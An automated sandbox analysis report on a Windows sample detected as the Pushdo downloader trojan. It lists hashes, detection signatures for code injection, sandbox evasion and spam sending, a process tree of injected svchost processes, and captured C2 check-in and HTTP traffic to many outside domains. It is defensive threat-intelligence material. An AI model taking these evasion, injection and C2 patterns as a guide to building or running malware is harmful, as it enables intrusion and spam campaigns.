Edit tour

Windows Analysis Report
6gjnnBAbpc.exe

Overview

General Information

Sample Name:	6gjnnBAbpc.exe
Original Sample Name:	9faea65cff61ad64e4bc4c3913c336be.exe
Analysis ID:	831928
MD5:	9faea65cff61ad64e4bc4c3913c336be
SHA1:	4fac3a2b3e76ee1b31a369ed53d145218952a340
SHA256:	987204ca82337f0a3f28097a5d66d5f3ecb11d43d82f67cd753d0bf2ce40b7a7
Tags:	32Cutwailexe
Infos:

Detection

Pushdo

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Backdoor Pushdo

Early bird code injection technique detected

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Writes to foreign memory regions

Found stalling execution ending in API Sleep call

Machine Learning detection for sample

Injects a PE file into a foreign processes

Send many emails (e-Mail Spam)

Queues an APC in another process (thread injection)

Contains functionality to inject code into remote processes

Machine Learning detection for dropped file

Drops PE files to the user root directory

Contains functionality to inject threads in other processes

Tries to resolve many domain names, but no domain seems valid

Contains functionality to compare user and computer (likely to detect sandboxes)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Connects to many different domains

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Connects to several IPs in different countries

Uses SMTP (mail sending)

Found evasive API chain (may stop execution after accessing registry keys)

Drops PE files to the user directory

Creates or modifies windows services

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

6gjnnBAbpc.exe (PID: 5932 cmdline: C:\Users\user\Desktop\6gjnnBAbpc.exe MD5: 9FAEA65CFF61AD64E4BC4C3913C336BE)

svchost.exe (PID: 5264 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 5260 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 1640 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 5560 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 5128 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 7420 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

pigalicapi.exe (PID: 1332 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 9FAEA65CFF61AD64E4BC4C3913C336BE)

svchost.exe (PID: 6052 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 10440 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 11604 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 13740 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 16472 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 23940 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

pigalicapi.exe (PID: 5956 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 9FAEA65CFF61AD64E4BC4C3913C336BE)

svchost.exe (PID: 4400 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 23212 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 23252 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 23308 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 6004 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Pushdo	Pushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.	No Attribution	http://malware-traffic-analysis.net/2017/04/03/index2.html http://www.secureworks.com/research/threat-profiles/gold-essex https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/ https://www.secureworks.com/research/pushdo	https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.pigalicapi.exe.24c1e88.2.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.10004088.14.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.10004088.11.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.f11e88.1.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
1.2.pigalicapi.exe.10004088.11.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
1.2.pigalicapi.exe.24e0000.4.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
1.2.pigalicapi.exe.24c0000.1.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.f11e88.1.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.f30000.4.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.10004088.11.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.2790000.6.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
1.2.pigalicapi.exe.10004088.11.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
7.2.svchost.exe.4000000.2.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
6.2.svchost.exe.4000000.6.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
22.2.svchost.exe.4000000.2.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.4000000.11.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.2791e88.5.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.2791e88.5.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.f10000.2.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
2.2.pigalicapi.exe.f10000.2.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.10004088.14.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
1.2.pigalicapi.exe.24c0000.1.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
0.2.6gjnnBAbpc.exe.2790000.6.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
1.2.pigalicapi.exe.24c1e88.2.raw.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
12.2.svchost.exe.4000000.5.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
3.2.svchost.exe.4000000.4.unpack	JoeSecurity_Pushdo	Yara detected Backdoor Pushdo	Joe Security
Click to see the 21 entries

Snort Signatures

ET TROJAN Backdoor.Win32.Pushdo.s Checkin - Source IP: 192.168.2.5 - Destination IP: 80.93.82.33

Timestamp:	192.168.2.580.93.82.3349698802016867 03/22/23-05:43:08.122042
SID:	2016867
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 59 4f 61 72 32 2b 59 46 31 47 54 78 69 39 63 52 67 65 51 43 61 51 6d 30 74 76 33 47 43 51 57 79 65 70 41 5a 2b 4c 30 63 74 2f 73 2f 79 36 6d 47 69 45 68 50 6a 75 66 6d 54 33 4e 66 55 30 63 68 4b 30 63 70 57 70 51 50 32 79 4f 4b 53 4b 4f 55 4d 70 49 35 34 50 45 69 4f 4c 65 52 35 36 51 64 59 45 42 70 46 2b 32 68 6b 78 38 4e 4d 65 53 5a 70 64 37 57 30 4e 75 74 6f 37 58 68 2f 34 37 6f 58 61 4b 36 5a 4b 48 4d 68 74 59 6e 4f 66 65 47 72 62 45 4e 59 2b 63 61 69 6b 32 6d 4b 6d 33 47 5a 34 2b 30 49 32 79 62 37 6b 48 52 4f 69 37 33 68 78 4e 6c 62 69 53 77 45 50 63 39 55 37 5a 2b 57 6c 6f 70 33 6f 4a 62 35 6b 6b 79 31 71 67 59 63 4f 46 68 53 69 37 34 51 52 6a 38 51 6f 78 6f 4d 77 45 44 31 75 69 71 79 68 37 44 66 30 6a 68 56 72 66 69 34 57 76 36 41 34 61 73 41 61 72 46 4b 6f 42 58 43 38 66 78 61 56 74 7a 57 35 4b 6b 42 39 6b 6e 46 38 2f 49 56 4d 52 52 33 75 6e 50 67 2b 65 66 61 59 6d 7a 33 65 4a 78 38 59 46 54 57 79 68 4c 33 6a 47 75 57 71 74 65 68 75 4f 4b 50 45 4e 63 74 6a 33 74 78 78 55 66 78 61 57 4d 64 30 53 7a 54 61 65 6e 31 61 36 58 30 43 5a 49 6e 71 36 75 72 41 37 6e 62 2f 70 54 61 43 39 66 75 39 70 6d 2f 6d 57 57 6e 31 48 34 59 67 54 6f 4a 30 48 76 50 64 2b 6e 62 31 47 30 49 4e 6b 51 4f 5a 68 70 61 61 73 45 65 6b 4d 66 57 6a 31 69 43 4e 4b 74 52 79 62 34 52 6f 41 6c 6e 53 68 72 72 48 4f 6a 67 4d 35 76 42 39 38 36 65 45 4b 33 63 64 79 52 42 55 7a 72 54 4d 35 77 7a 67 45 77 32 50 75 74 38 46 45 73 67 54 44 64 6f 55 39 75 76 79 36 74 58 71 73 4c 44 47 78 57 51 73 50 30 76 76 56 47 41 4a 70 48 71 6a 55 42 36 76 65 75 46 61 4d 68 56 35 41 35 6e 4d 4f 55 30 42 50 54 54 31 6f 6f 2b 6a 44 36 36 34 72 67 6f 43 4b 52 4f 42 6e 41 31 2b 2b 2b 61 57 78 4a 62 41 3d 3d Data Ascii: YOar2+YF1GTxi9cRgeQCaQm0tv3GCQWyepAZ+L0ct/s/y6mGiEhPjufmT3NfU0chK0cpWpQP2yOKSKOUMpI54PEiOLeR56QdYEBpF+2hkx8NMeSZpd7W0Nuto7Xh/47oXaK6ZKHMhtYnOfeGrbENY+caik2mKm3GZ4+0I2yb7kHROi73hxNlbiSwEPc9U7Z+Wlop3oJb5kky1qgYcOFhSi74QRj8QoxoMwED1uiqyh7Df0jhVrfi4Wv6A4asAarFKoBXC8fxaVtzW5KkB9knF8/IVMRR3unPg+efaYmz3eJx8YFTWyhL3jGuWqtehuOKPENctj3txxUfxaWMd0SzTaen1a6X0CZInq6urA7nb/pTaC9fu9pm/mWWn1H4YgToJ0HvPd+nb1G0INkQOZhpaasEekMfWj1iCNKtRyb4RoAlnShrrHOjgM5vB986eEK3cdyRBUzrTM5wzgEw2Put8FEsgTDdoU9uvy6tXqsLDGxWQsP0vvVGAJpHqjUB6veuFaMhV5A5nMOU0BPTT1oo+jD664rgoCKROBnA1+++aWxJbA==

Source: unknown

DNS traffic detected: queries for: www.olras.com

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_04001840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_04001840

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
Source: global traffic	HTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
Source: global traffic	HTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
Source: global traffic	HTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4680
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4680
Source: global traffic	HTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=8dd73ce1a917b5d53ecdcb71ebb9bc82
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
